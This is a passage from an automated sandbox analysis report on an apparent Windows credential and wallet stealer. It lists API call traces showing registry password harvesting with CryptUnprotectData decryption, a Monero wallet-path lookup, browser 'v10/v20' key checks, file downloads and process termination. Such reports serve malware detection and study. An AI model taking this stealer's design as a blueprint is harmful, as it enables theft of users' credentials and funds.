                            • Instruction Fuzzy Hash: 2061BD71D1122CAFCB61DB64CC58BDDB3BABF58300F1049A9A649A3351DB70AF859F90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6AFF
                            • InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D6B2C
                            • StrCmpCA.SHLWAPI(?,0101FB50), ref: 006D6B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 006D6B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006D6B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006D6BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006D6BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006D6BF0
                            • CloseHandle.KERNEL32(00000000), ref: 006D6C10
                            • InternetCloseHandle.WININET(00000000), ref: 006D6C17
                            • InternetCloseHandle.WININET(?), ref: 006D6C21
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: afa555334efeaaf87bdeca7ad27c1055c80b2113ef21635a49ae350045eb6621
                            • Instruction ID: 18fa1c57571c57d010cd36762819393afdb865d14e7ea53c5038a47fa2f67d6b
                            • Opcode Fuzzy Hash: afa555334efeaaf87bdeca7ad27c1055c80b2113ef21635a49ae350045eb6621
                            • Instruction Fuzzy Hash: 4B417FB1A10215AFDB20DF64DC85FAE77B9EF44700F004456FA05E7280DF70AD409BA4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,006E4F39), ref: 006F4545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F454C
                            • wsprintfW.USER32 ref: 006F455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006F45CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006F45D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 006F45E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: 9On$%hs$9On
                            • API String ID: 885711575-1522059728
                            • Opcode ID: 5ab3c0ae66d0407ac5f509346426e67baf750f9e5fe258bed653b1386a38e841
                            • Instruction ID: 09fe39018f981b7fbb5e84f623b7d526273e93aff102a02732486d42a6980fd0
                            • Opcode Fuzzy Hash: 5ab3c0ae66d0407ac5f509346426e67baf750f9e5fe258bed653b1386a38e841
                            • Instruction Fuzzy Hash: BB315E72A15209BFDB10EBE4DC49FEF7779AF44700F104059FB05A7180EB70AA418BA5
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DBC1F
                            • lstrlen.KERNEL32(00000000), ref: 006DBC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DBC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBCAC
                            • lstrlen.KERNEL32(00704AD4), ref: 006DBD23
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 61caa106fb5859a850b3f5105e3572778dabce16e6b66858aad39b2e7f9be203
                            • Instruction ID: c021cca8111fd4c6c156cdbf6749aaf26e28346cdd5253c5ae3b693345180aa9
                            • Opcode Fuzzy Hash: 61caa106fb5859a850b3f5105e3572778dabce16e6b66858aad39b2e7f9be203
                            • Instruction Fuzzy Hash: AAA17C70E15206CFCB60DF29D959AAEB7B2AF44304F19906AE809DB366DB31DC41CB54
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 006F6014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 006F609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F60D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 7edebb6e2a4274e14f2ed6937397938396ef5103633178784d85189946eb41ae
                            • Instruction ID: d36cfcec3cffa3a8ca469b0672dd5dbe9ebcee5f3972ebf19d1e2ffafd9ceb7b
                            • Opcode Fuzzy Hash: 7edebb6e2a4274e14f2ed6937397938396ef5103633178784d85189946eb41ae
                            • Instruction Fuzzy Hash: EB618C70700608EBDB18CF5CC98597EB3B7EB85304B344A99F6928B781CB31AD81CB95
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE06F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE07D
                            • lstrcat.KERNEL32(?,?), ref: 006EE098
                            • lstrcat.KERNEL32(?,?), ref: 006EE0AC
                            • lstrcat.KERNEL32(?,0100A4A0), ref: 006EE0C0
                            • lstrcat.KERNEL32(?,?), ref: 006EE0D4
                            • lstrcat.KERNEL32(?,0101E4D8), ref: 006EE0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006EE126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: ad6307e8b8d00f3b7f6f9506bc5b909a63f59b0910ddbd22694dff844ae39af1
                            • Instruction ID: deb615f5be63ccd1a5e4d9d0614f12a72400e7e6a4f6e43b9a808b97f7cf3bbd
                            • Opcode Fuzzy Hash: ad6307e8b8d00f3b7f6f9506bc5b909a63f59b0910ddbd22694dff844ae39af1
                            • Instruction Fuzzy Hash: DD41A971D212289FCB61EB64DC58ADE73BABF58300F0449A9F94A93351DB309F858F90
                            APIs
                              • Part of subcall function 006D77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D7805
                              • Part of subcall function 006D77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006D784A
                              • Part of subcall function 006D77D0: StrStrA.SHLWAPI(?,Password), ref: 006D78B8
                              • Part of subcall function 006D77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D78EC
                              • Part of subcall function 006D77D0: HeapFree.KERNEL32(00000000), ref: 006D78F3
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006D7A90
                            • lstrcat.KERNEL32(00000000,?), ref: 006D7ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 006D7ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 006D7AF0
                            • wsprintfA.USER32 ref: 006D7B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D7B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D7B47
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006D7B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: dd36ee0a0d3504b4c7299d1bc727c3209e492ca93552c921acb1331138ee50c5
                            • Instruction ID: 0494707fdab37c2210317adf608874b6b3a3bb25bf6bcfe9d59662ab0274e18f
                            • Opcode Fuzzy Hash: dd36ee0a0d3504b4c7299d1bc727c3209e492ca93552c921acb1331138ee50c5
                            • Instruction Fuzzy Hash: 623196B2F18214EFCB10DF68DC449AFB7BAEB88700B18451AE54693350EB74E941DBA1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8243
                            • lstrlen.KERNEL32(00000000), ref: 006E8260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8297
                            • lstrlen.KERNEL32(00000000), ref: 006E82B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E82EB
                            • lstrlen.KERNEL32(00000000), ref: 006E8308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8337
                            • lstrlen.KERNEL32(00000000), ref: 006E8351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8380
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: b144149c01980974b7bd0194c7d7a4215302c3171d868fa3853ac2f04bbc63a4
                            • Instruction ID: c5a99443bf470e11aca9515e3861fa5cdf4a020dbc5e9db3957f1651066f8f71
                            • Opcode Fuzzy Hash: b144149c01980974b7bd0194c7d7a4215302c3171d868fa3853ac2f04bbc63a4
                            • Instruction Fuzzy Hash: 06517C71A026129FDB10DF7AD868AAAB7AAEF04700F144514AD0ADB345DF30ED50CBE0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D7805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006D784A
                            • StrStrA.SHLWAPI(?,Password), ref: 006D78B8
                              • Part of subcall function 006D7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 006D775E
                              • Part of subcall function 006D7750: RtlAllocateHeap.NTDLL(00000000), ref: 006D7765
                              • Part of subcall function 006D7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D778D
                              • Part of subcall function 006D7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006D77AD
                              • Part of subcall function 006D7750: LocalFree.KERNEL32(?), ref: 006D77B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D78EC
                            • HeapFree.KERNEL32(00000000), ref: 006D78F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 006D7A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: c97bd54a08b7718c5d89ed13946f82f00ffdaefeb1483a3fc9d9f395689699b0
                            • Instruction ID: 0d3b02acf1a413268f8605a260030034a78f49bf0633b9483ddb82fd7865b321
                            • Opcode Fuzzy Hash: c97bd54a08b7718c5d89ed13946f82f00ffdaefeb1483a3fc9d9f395689699b0
                            • Instruction Fuzzy Hash: 8C7150B1D0421DAFDB50DF94DC80AEEBBB9EF49300F1045AAE609A7340EB315A85CB95
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D1135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006D1159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006D1173
                            • RegCloseKey.ADVAPI32(?), ref: 006D117D
                            Strings
                            • SOFTWARE\monero-project\monero-core, xrefs: 006D114F
                            • wallet_path, xrefs: 006D116D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: f5de13c2cebf279b44ceb63b6f486d668609752e5ac0cc1c6fd61ca978c8742f
                            • Instruction ID: 062504ff3a9730d16aca8a07a0860a7bd79ae2dacb95b26d1c90b54ccafd3ed5
                            • Opcode Fuzzy Hash: f5de13c2cebf279b44ceb63b6f486d668609752e5ac0cc1c6fd61ca978c8742f
                            • Instruction Fuzzy Hash: 82F067B5A40309FFE7009BA0AC4EFEB7B7CEB04715F000155BF05E6281EAB05A4497A0
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 006D9E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 006D9E42
                            • LocalAlloc.KERNEL32(00000040), ref: 006D9EA7
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • lstrcpy.KERNEL32(00000000,00704C48), ref: 006D9FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 64152661e08c17e7e4f458bf8be6c286fe2eae38dad3fef99b3279d0c00809c7
                            • Instruction ID: 59006f12fbca8c1452b57867ae0de89bf7ad8c10c41788fe1472ae0f04170bef
                            • Opcode Fuzzy Hash: 64152661e08c17e7e4f458bf8be6c286fe2eae38dad3fef99b3279d0c00809c7
                            • Instruction Fuzzy Hash: 4A51B0B1E102199BDB20EF65DC41BDE77A6EF50314F15412AFA09EB341DB74ED058BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006D565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D5661
                            • InternetOpenA.WININET(006FCFEC,00000000,00000000,00000000,00000000), ref: 006D5677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 006D5692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006D56BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 006D56E1
                            • InternetCloseHandle.WININET(?), ref: 006D56FA
                            • InternetCloseHandle.WININET(00000000), ref: 006D5701
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: a5b490f1da90d15d0c011c4762620bbff2c743894d66d196f66972e2400b457c
                            • Instruction ID: 28a8753452fa33f4445193c4c2a0501ba4b04d2eb9432339c5aa4c2a16833af7
                            • Opcode Fuzzy Hash: a5b490f1da90d15d0c011c4762620bbff2c743894d66d196f66972e2400b457c
                            • Instruction Fuzzy Hash: 89419170E00605EFDB14CF64DD88FAAB7B5FF48301F2480AAEA199B3A1D7719941CB94
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006F4759
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F4769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006F47AB
                            • CloseHandle.KERNEL32(00000000), ref: 006F47B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F47C0
                            • CloseHandle.KERNEL32(00000000), ref: 006F47CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 178af53ea7094468c926e523db4af27abb974529bde367ab4820e17d79da8e01
                            • Instruction ID: 3864e96b4f2229fe547b3e54d496356d8de7691c2a464741362e18dd697d9903
                            • Opcode Fuzzy Hash: 178af53ea7094468c926e523db4af27abb974529bde367ab4820e17d79da8e01
                            • Instruction Fuzzy Hash: E001B171615219AFE7206B709C8DFFB77BDEB08B52F000190FB49E1281EF708D909AA0
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E8435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E846C
                            • lstrlen.KERNEL32(00000000), ref: 006E84B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E84E9
                            • lstrlen.KERNEL32(00000000), ref: 006E84FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E852E
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E853E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 05714bd08e4259ea9eca268396b04c1337b4198ac6fd3a9d075545bea3a94c58
                            • Instruction ID: e31a31b6ee78ac80f05492eb0b7330c933628c44587ac985869c91b2bc3b7d80
                            • Opcode Fuzzy Hash: 05714bd08e4259ea9eca268396b04c1337b4198ac6fd3a9d075545bea3a94c58
                            • Instruction Fuzzy Hash: 14518F719112469FCB60DF6AD894A9BB7FAEF58300F148459EC8ADB345EF30D9418B90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006F2925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F292C
                            • RegOpenKeyExA.ADVAPI32(80000002,0100BBF8,00000000,00020119,006F28A9), ref: 006F294B
                            • RegQueryValueExA.ADVAPI32(006F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006F2965
                            • RegCloseKey.ADVAPI32(006F28A9), ref: 006F296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 9fec511c62196403fbf4c2f4ea86904d59d366d36c197abdf03877293cbc9a3c
                            • Instruction ID: 9487a5e161a0fd911e05272df23f5bf659ce0dfb6cf021b258fce7f0dc6f296b
                            • Opcode Fuzzy Hash: 9fec511c62196403fbf4c2f4ea86904d59d366d36c197abdf03877293cbc9a3c
                            • Instruction Fuzzy Hash: FF01DF7560431AAFD710CBA0DC69EFB7BBCEB49711F104098FF85DB281EA7159048BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006F2895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F289C
                              • Part of subcall function 006F2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006F2925
                              • Part of subcall function 006F2910: RtlAllocateHeap.NTDLL(00000000), ref: 006F292C
                              • Part of subcall function 006F2910: RegOpenKeyExA.ADVAPI32(80000002,0100BBF8,00000000,00020119,006F28A9), ref: 006F294B
                              • Part of subcall function 006F2910: RegQueryValueExA.ADVAPI32(006F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006F2965
                              • Part of subcall function 006F2910: RegCloseKey.ADVAPI32(006F28A9), ref: 006F296F
                            • RegOpenKeyExA.ADVAPI32(80000002,0100BBF8,00000000,00020119,006E9500), ref: 006F28D1
                            • RegQueryValueExA.ADVAPI32(006E9500,0101F7A8,00000000,00000000,00000000,000000FF), ref: 006F28EC
                            • RegCloseKey.ADVAPI32(006E9500), ref: 006F28F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 29d298cfef210f73d68977abfec04457cd0397e5f9028ceef0f895d49f033742
                            • Instruction ID: 2efcf375a605ee69b2e87e86ec32b13e0b4649f7091d28bf5a0bee845d02292b
                            • Opcode Fuzzy Hash: 29d298cfef210f73d68977abfec04457cd0397e5f9028ceef0f895d49f033742
                            • Instruction Fuzzy Hash: B601AD71B14219BFEB109BB4AC4DEBB777DEB44311F004158FF48D6291DA709944ABE0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 006D723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 006D7279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D7280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006D72C3
                            • HeapFree.KERNEL32(00000000), ref: 006D72CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 006D7329
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
